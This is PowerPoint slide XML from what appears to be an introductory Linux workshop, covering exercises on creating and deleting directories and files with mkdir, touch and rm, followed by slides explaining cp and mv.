              <a:t>In Goals 4 and 5: Yes, you can.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41479487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t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making (and Breaking) Memories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119921" y="1825624"/>
            <a:ext cx="8964117" cy="4964919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Create a directory called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exercise2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Navigate to your newly-created </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd exercise2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Create a directory called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> keep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Create all the directories in the path:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcbgso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/workshop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcbgso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/workshop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Create a file called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memories.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>workshop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> directory.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcbgso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/workshop/memories.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Delete “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memories.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>” without changing directories  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcbgso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/workshop/memories.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Delete the directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which is located in your home folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcbgso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>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1068886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Moving Things Around</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Overview:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3.1: Copying </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3.2: Moving Files and Folders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3.3: Renaming Files and Folders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3.4: Viewing/Outputting File Contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exercise 3: Moving Mountains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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27758886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3.1: Copy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;source&gt; &lt;destination&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	Copies the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;source&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to the location specified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;destination&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; you will have two copies of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;source&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: Recursively copy; for use when you want to copy a directory and not just its contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Examples:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2376487" y="4471988"/>
            <a:ext cx="4391025" cy="1704975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2124538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3.2: Move</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv &lt;source&gt; &lt;destination&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	Moves the </a:t>
            </a:r>
            <a:r>
